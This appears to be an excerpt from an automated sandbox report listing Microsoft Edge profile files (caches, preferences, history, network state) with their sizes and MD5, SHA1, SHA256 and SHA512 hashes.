                                                                                                                                                                                  227e8b02e63307e1db51dce46105e4e0ac328ece736883fc24cb6212c7ce78080b57cc1951671ba8a1cee96546f74e9f0dd254b9efd55fc48fdc8632bac3350b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3e35fe84-76ee-4c9c-8a6e-1d071049c4f1.tmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  5058f1af8388633f609cadb75a75dc9d

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  44KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ff205210e95cfcd931a64026217bbec8

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  9e7a84bfc44af7e892f749834bef6affd24a2e05

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  fa14195f3706b2f1123892e4eae57ede8938f4a89c140c3ad82023fb2ed349db

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  25caa5ad7f3684c60a9e04737f0f82d2b22aa341cd6df50324abf6efbbb801cf16464b5385f91d5c811473b95fc20fbca644c9567e897db401558e8de297420e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1bddd4b83390c5af18aa720d117d3be2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  dcb5aa6fddeb2e5c67fde1f436b97784cbb70b9a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ff7dd816432c35030acf8227c00ce0d80ed47498cfd93ae5a31012d75a9d663e

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f8d9e7d75eb9563a01fbb7773cf55387f379e40d9e7343be7b038890a8e10684f05e1ed29d5c6ab6f155e1108b375f70df0abbc28819823d6b71e37b7724cf80

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  55a5e4be1043f97974ad0145e4f919d5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0dfa01e10aa4370df9769bb0590bb3d83b75bce8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  33909afb3718559c8e8ae33471f38fe0a4c773ee39a265b8831fae546a2e6653

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  cfb46b80674db3429a555b9b2f780aef7c29a1cd60aa91f4a5bbe86061f3cbe1a5c505d2c4334cf85f80e897d7bbe3f6b68f12b92e8e7cfa4794352062c2f7e7

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  45b67fec2e02a21db9c507657a70c6dd

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a41504cd7413bf9db82f921a3c39da08983d5acb

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4d775288fe59745b2101851b76d883f872a87c9a60b961748670760a886ab7d9

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  29d21e14e9fd89ecea53ffe25626f44563cebe6e6334fa7343d450c048418af61f41cb9598cb548fb0942616dc13628de56dbbb6487c33d2821d67a51edf9bef

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  17fdeafd31f9fea9a763e1b5d1439bd2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  bdb672a8ffc8cfcf3a74b7148b71c1479c7bdb75

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  4b51650c7f4dd57c20ad4cb72f8a62aebcec9203fb914d8ec42990630b72be86

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d47d9e731366319c8c62f0b8d94eae2303cd61cf61d751b076b566b1f64cb1736b3cbf6cc98f5bd154f7fccd050f881530c86fbb912b5b1a9863c1df68f11344

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  56ba3b3048b45c25a08a504f9714cde9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4046132fd563091dd827f2c1f7bec6aa0c654f74

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  545d27c9db2953acebe97d344ecbd5f753c0ee78fb455764f4ac0febef46c361

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  46322c522c6b42b64b39a24b0a42accb1809de00f2367f68ae986e622d13ddb1b1a9735400581a42e9d5419afaf8b3d86abcb4d2fb238adbbb2113079fe850a1

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3f39f9c307d2c1f57ae1f544fa58ef33

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6f23186120dde1e5dad78b9e0878868cd14a313e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8f5ecd9f14b8ba172254bd7e956fea30a12443b81dde3a4d24710b6f5891593d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9d97c4af469a7c6015f3bdbb52de652a226df6a32b3a3dfca4ab36bb87b8dee32dde86b5701d2c1fd02e12d8c2c07b5a1ef43ac77a4da3162ffb99ecace44aca

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  3KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  793965d74491c98bb40570cf8354f8dc

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fd7335426e600bc645a747f3f3a8ab3d374aa0b4

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ac540919dd1298f72112fcbdf4057ce22fa79f07d9d2f7a2d1e62d13d77b93a2

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0a2fb917d863d8798f4c576de1d42f5db55a3cf50db27b2246cb1c1dd4908aeb5d0c2e17c81bed392bd3d50204f15df22aeac5292712dab5aab5b57613e7c261

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  72B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  71131ba9635a6044c7a919d9de90edca

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c14e9ec9cd8c43a7cc42fa64c259d83c602bfe2d

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  3bbbd06f607a7675077c92c0d4dceb54265109cd23c5980d1b45ac401aed4081

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  08d7b69eee7d6bf2cfce1d4aedbc7f97f5f212d26132fa58f4552929c880f394d716d3317c0ac21b387e74d06bd71bdae1a158268c571fca5635edd92fb55faf

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  319B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  021d370977801650c698e519d91eb524

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  571d7dafc6bb72975d0e0103db0592669daae18a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  9de48e48b243c4e9ebb0fc84e4c37935c61efa42d677c1933eb69697d31d26b0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  cb615a7ae42f3fee1dc415681ab3c4fa3c43fe9b8f2fedf8f724db7bb49e93c6043de00c4f34447a60b939a57968bb997c19e175a69c62f36d3e82bd1f90c57f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  20KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ba7a59a58b0044fe4662aa1573836b0b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ee6fbfe783cb05406cda33e475d2065603ea9810

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1a89a01422758f9917c1e42ba999bf611c3d96eea669026e87d2c303dc241994

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7fd7832142061822f7ff848f4c5902a2639518b06a936aa4868e16ebaa1c26c6dfc78317e117cad3e8929b42cfcf2682ab477c4fcc81a9d09bac21b54b7b0444

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  264KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4589a1e72adb8bfc73a239a2282e6d73

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  b335ccf5cfdb0fc91ff886c3da0c1f0eb8b29523

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d0295211e2c1e777ecb537a77d358307225d6f17638f72887631a0f8b4155117

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  500b28b4cc15c88012011646a1bbb563a884b2dd8929c184fb7990f38cf0b012ed8278c41512fab68250eb2fbdeec48c131ae5da4ce990f2f5b9c13a9250289e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  264KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  9a3020cfdafc560060276561841e0695

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6748c3a91a8e18dd3996556ee5dfccc705c64f2e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  623030497aeb3e09747d2785bc636ab2b9353d8d2ce1c2d23ae09b69a7e24336

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9f04e3db4d585b5482328fdc686f471e6a37e23c35907fcdd466b3db478a551cc12d38e8325f5172cc77361d23124e839f596ed2440a9805321cca6f0698e0a4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  124KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7baef585db3147fc255d8e47d5860c96

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5925c0f2d186cf8926ac66501f856d521db63d37

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  121359128a53d5161098eb961184af400345eb3748154364b948ff6def85c8c7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  37d6a79c8deff79bf45072616472f758e9e2b1696098e0aa393bbaaebb60bb155e86455780e7ba59d51c918e4ea44a280dfc3703e950a325b36293c667ce46fd

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a9851aa4c3c8af2d1bd8834201b2ba51

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  fa95986f7ebfac4aab3b261d3ed0a21b142e91fc

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  331B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  62877462e87586d43d9a5c72cb33e024

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  41e8e4544650ec1172c51f8d60aba167ffc13dd3

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  45a6062d649ac063652064eb867f92c5fafacac4755a8d1ef6b45bb4d69436fe

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f539df1a3adf4c59bb1ff4da5f62650a453da649c99e210a6fceac98cdbd17de26534a2a062c1d621a8846062302f114102a3b42e9b0e3f4867c659f55609bb3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  251B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d384d09b34472009d2fdfe60f6dadeab

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4035eaea22d46e6bee9883893af82a126b38a7e2

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  9fea84805a2eb0b338259f3939c4f0b78a0df515033e005e03189458ea14732f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  ba626bafc81a77b4cb541b704b41a72a80b02d63a068eb41a1ca2ddd95173c1ec37b5243aa5ff53f0920c4c311da825d7fca8ecb667af5795f211c204e15c6e0

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4d0c4230e16985e3c3989bc1a54bcff2

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6579d8749799d2981a5705edc07f76610539f2a8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8ef43aba1f5df67cc4d5f30e90f214324030336c6be1aa9339e749ef39cb8ef3

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  4a93a75f97390ad38d9997eafe464b9bd0b5cdc869b5c70d36f71f7c3fd7f846e921a4a4941cd7b405faaf5de2c03137842c0a252d42732a0803a274b4a32619

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  111B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  285252a2f6327d41eab203dc2f402c67

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c901ea1d49e0e18253ebe40b20a8d4a6

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ed058c64a2627a0188fd5648bd6ca6a17d1bc44a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f6b0b960a6fa59487ffb0ef248ee440e55f0a772deda6ff8fb261ef9057af81f

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fd999ce99761a665035f591bc7432fba4de6f268fee4d1cb596f1a65c2f8d7f9f0780b0db914bb919241f2f8751c5db713e1d27146cc269db987da153d4bf504

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1affbd71969c91fed3a49cd7c09e320b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7c10d8aa5986f22c8b9f3307ccd435884196d5a8

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  8deef2e94b8b9c8ff8eaff6bd798ef975be91076e762175189f0157108150d14

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3234c788e7dd9515719ef31753add6b9f2ef2791ec6802db28d517699f223874ff6b94e3475e51bcebc899bc61c57ec384cbd30e2a319dcaef5dc1b3166f4120

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  972b24b406fcb42b6e1c7e516b66fd19

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  2de81be098c4f98ed0cb4c2da736409b85ad07f2

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d6b3fbc1e2680c558cff8daf3831d98efcb15e6eafb9bdf713ca9f1df041b2ba

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  98b6b857f5a616c8cc1c97fc967e891ccd86a5cccb32e41985a60a20ee991bc646d4d83c93078534c02b1bd645336843aa0c999aa4884497788076dfbe9ea862

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  36fe9e67dacd46deb3a1e3741598a6f9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ccbe32436a72d27568513731b44b2d31ea27efa6

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  9c81abf775364a4e28273b9630ce5ff409fe2146ddec4f7d1b03b126178a1c90

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  cff19c453c695d87a62d4ccbe8953949db11e630f3d7c9c0fe20a0e4cacd24da649423e19ba5bdcd56bcef3d08530663844f687c87c05589164f098f3500d8fd

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  6eef1c80d027613719ff4505eb91d3cc

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  f3c4a641bc37dbe2aafe030b3a5f43473ff4b054

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  528d1de7438210d52907697fe80d52b7f992acb2b7370c0c2a73f1f4abc569c7

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7b5321a45ad2f70a9d9847d85b6da051e689886a223ebed56b540e6707bd9b4fe4dc47f600aec05aa51adcbd49d23557a55f19c54be127ae7d0af6056160ed11

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  29616dae8ca7a5d6b4b00730fc4d8e05

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a3867b405b0248057623fbec5685923d57bfa4b5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e951f8cc2b2dd566fb4570b3208058263ed2f86f1b2fd4f26750c49ea24000b8

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d141e17873e70c2d8fd6d45712b0f7706662f4190698f7e31dcafecc22e2eb59ca316ca0b4fa489de4cbcacccbd88f216d1f7af8c2d16d9464df980f4e880a2f

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  d4f11cb2792c94d2aa7f3dda991d8c3e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  544a4de779b29389d77edf554831bace9f6f2491

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  de61c5d670fcf18d736b6e10277c4f8d5ca6a812fbd70c6fe599eff461d41931

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  6635d1a3342fff16125dc78a6b1d3e37759fc06790a2411f53c8f02c9a1fb37d1a4cdf86c03b39b37149086daa48aff0c008ef16d664fff608ea29304e386cfb

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3bbdb4a055e413dd5efbb344b752de73

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3b6ecc181d3ba5751e625d2e8d8d9d89ee8cd4eb

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b6d26965f9dfa639bdd92898e712558f7b70ebe2a3205d8a5697a99ea361cc2d

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c7fc96160d57b4ebb97bf584b7d3b3b8fda954bd77c579200f2c18594e4eb7f7d14c11d5a88bec3164a3cfc6d46a88fcc8ec400a87df2237d50f7a6c895fdde4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  abde141e4b0c184a45da055a7717cea3

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7f567a5ec74b142514ebd3ea1042ab0423c389e9

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5f571305d9bfa396d32d607e3b70570029b4c8ee0adffa2d4540dfdd28718480

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  61c6d498edfc4b7be0840a4e9546ec1fa7972c92a191aca3ea3728ba3e83e02583454fc472e028bf763d40d7e326413c81f2ba4721ed45d791ed7294ba598825

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  53e6342f5ef50efa4c0cf073f742a216

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  e58b12c2d6ecf91c8749e5c438354fcb5f1a9396

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  26e4df24528875658d8066583c5419e52952179190c1111959a0d17312096520

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  700ef1fda12778968a45524b9494bfa1129a1d68ad1aafdfe5e84e4a9eef0fd5b9f53d33b4c9c1c527bf6f63f6fc626a7338019856d9765c828f1f06ea43bc69

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  42539efb0d28e078a4e5e492c2b8a062

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  0ddfd3bb8c5d357e8ab96e2d5fbf6b68359d24b0

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  2885e9d1232f17c1c788faa3dcadc0b24c69b0ad3365f38b97cfbd9e2597efbd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  942147dedca4b2f5dd5369d9f3f6d99c059dcae5d3da2808c1be8fd18facc0042aa79f00526e0c01e5243fe8d3f40b54524a6a44d2ed9758641ef4451e34c64b

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  0ea54bbafc8ae80a90591ad0cece8e51

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3778610a00c0b0a59eebf6342a4e1c1956db9e9e

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  bcf79e097556bf8e7c1cb9c967be3594a329d06e0067105da84363444552e5b4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  fab0dc88d1cfab8275f4481a4a40de7fd849655e419d44b05c020081fcd18ed7e5ff3b5d733a9fb698c8cdbcb68d40c8be9b24a8649952bc83da0135fb15d1e4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  5KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  456acce29989f49b8eeefe970de512b4

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  14fb05c51f8ba869c15b4f8eacc580c285aa8f1f

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0aa8626c312210f61c119e5f56d72c4fd7ffd6571183a58041d49afe286b7cb4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  f42cb036065626e48918eada80b1ac70a7fc01c78f6107f85439577c176f9653c99a87dc394fbd6c90aefff17e14d221424de5a841f56d1d03f98e8877bfc189

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  6KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  216d22a250a2663be7f7fd2554596dc8

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3ead928c5717ecc80c70c7441fcc170a6454ef57

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  0a51d65d600371f44160589ef1af7622460e6dc686a13675cdd5cb50033f33f6

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5331c19c76f154910294a508818687966557a21fa4aecc1ae37a8ee84afb2558794cbb9e006d0cfcda414217908fbdfab4c888ab746c76ea74c8894988fe1f6d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ef0236f06ff4049a96db04176bc838e5

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d94ecae32a64d0bc12e882c96a97ea338c2c1203

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  15cc47ae3c4bcc42e4042c735d77d26e2db661439d5a00a39b61a1cfee935c75

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  c42437e26d25e4c33ec1dc6a1eb1ecb653a8407e01175c246a1691fcdc2c3c687fbb302ce8b736eccaa0796903ed59dc4232ae4798ede08056e30bd8b8b4c25d

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  23601bd364e3970a673d8dcf0d8a04b9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  13423814d73cb7bb689adcfd227fe26abd3341bf

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  1022525922f33a4c30356d2b86af5f324a7b758aa805e9c3cd7ab503b3b50642

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e1fe525ab094664294cfb3ecb6cac15ef2aba26abce754ef709285f56b9452f782c52479b2ac24c78d876a0339f4d2085bc8497ac7b6930e5949052fb67bfed7

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e14eafdb39f7fe580dc4071f474e36d3

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  42a149040d696591357dee338246086dec50ba02

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  d00ba12128db2557e6a01be96c371ecead2cc84e0c31350cc307ffab66511db8

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  304a30b4f31d35b735024e1e09fe3fcdf3947c823edc9850c2005a28ed8880f1b9024b82b35f1e755d97fec58d22ccc656b0b262cae7c5a469c065835b36fa84

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e7eafaa605dcf14ff988eb07741a7148

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  dc3f50cf08d4d701177dc33344848ca36829e4d9

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  df8bcf3d5a217f868d41af4bd2ecd9f06c73a94705ded201973734511bcc0063

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  1b5ab92c02b1ae5fe6ba5315fae19112f5fd54d2519333c3daf5fe8b23bbc2b84492f5a2d363e3c43285d06adf86afbb5b302e05b8fe4045e05e85f850c2370e

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  3280ca711729591aa8875176c579650b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  c36058429a79037347e6b1fc771bcb40ab189016

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  41b0e1db835360437b8056569966331a0ec47d73dcd5d2c664f934b8caa8a69a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  208962cb089a76f648fae33732cebb6686160f3fd506dbf3b312837af0d8d1a20a3bb231ba0e5e224c050abb306eb697378addeaf8b415c676da780299373d9c

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  7KB

